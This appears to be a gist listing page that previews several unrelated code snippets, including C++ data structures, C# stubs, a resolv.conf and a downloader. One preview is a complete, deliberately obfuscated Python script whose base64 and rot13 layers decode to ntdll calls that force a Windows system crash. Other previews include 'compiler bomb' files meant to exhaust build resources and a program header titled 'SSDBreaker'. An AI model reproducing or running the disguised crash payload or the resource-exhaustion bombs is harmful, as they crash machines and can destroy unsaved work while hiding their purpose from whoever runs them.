This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # /etc/resolv.conf | |
| # NAT64 | |
| # echo -e "nameserver 2a01:4f8:c2c:123f::1" > /etc/resolv.conf | |
| nameserver 2a01:4f8:c2c:123f::1 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Reflection; | |
| namespace Internet_Explorer | |
| { | |
| public static class Program | |
| { | |
| private const BindingFlags MEMBER_ACCESS = BindingFlags.Public | BindingFlags.NonPublic | BindingFlags.Static | BindingFlags.Instance | BindingFlags.IgnoreCase; | |
| private const string HOME_PAGE = "https://www.google.com.tw/"; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import base64, codecs | |
| magic = "aW1wb3J0IGN0eXBlcy53aW50eXBlcw0KDQpjdHlwZXMud2luZGxsLm50ZGxsLlJ0bEFkan" | |
| love = "ImqSOlnKMcoTIaMFtkBFjtZFjtZPjtL3E5pTImYzW5pzIzXTA0rKOypl5wK2Wio2jbXFxc" | |
| god = "DQpjdHlwZXMud2luZGxsLm50ZGxsLk50UmFpc2VIYXJkRXJyb3IoMHhDMDAwMDAyMiwgMC" | |
| destiny = "jtZPjtZPjtAvjtL3E5pTImYzW5pzIzXTA0rKOypl53nJ50rKOypl5RI09FEPtcXFxAPt==" | |
| joy = "\x72\x6f\x74\x31\x33" | |
| trust = eval("\x6d\x61\x67\x69\x63") + eval("\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29") + eval("\x67\x6f\x64") + eval("\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x64\x65\x73\x74\x69\x6e\x79\x2c\x20\x6a\x6f\x79\x29") | |
| eval(compile(base64.b64decode(eval("\x74\x72\x75\x73\x74")), "<string>", "exec")) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Circular Queue | |
| #pragma once | |
| #include <exception> | |
| #include <sstream> | |
| #define DEFAULT_QUEUE_CAPACITY 16 | |
| #define NO_ELEMENT -1 | |
| #define NO_ELEMENT_MESSAGE "佇列沒有任何元素" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Funny Stack Queue | |
| #pragma once | |
| #include <stack> | |
| #include <exception> | |
| template <typename T> | |
| class StackQueue { | |
| private: | |
| protected: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using AngleSharp; | |
| using AngleSharp.Dom; | |
| using System; | |
| using System.IO; | |
| using System.Linq; | |
| using System.Net; | |
| using System.Text.RegularExpressions; | |
| using System.Threading; | |
| namespace OldHandheldsDownloader |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.IO; | |
| using System.Text; | |
| using System.Threading; | |
| namespace SSDBreaker | |
| { | |
| public static class Program | |
| { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off | |
| title Java Bomb | |
| color 3f | |
| javac JavaBomb.java | |
| javac -J-Xmx16G -processor JavaBomb JavaBomb.java | |
| pause |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| namespace CSharpBomb | |
| { | |
| public class X<A, B, C, D, E> | |
| { | |
| public class Y : X<Y, Y, Y, Y, Y> | |
| { | |
| public Y.Y.Y.Y.Y.Y.Y.Y.Y y; | |
| } | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #pragma once | |
| #include <string> | |
| class BigInteger { | |
| private: | |
| int sign; | |
| std::string value; | |
| public: | |
| BigInteger() : value("") { |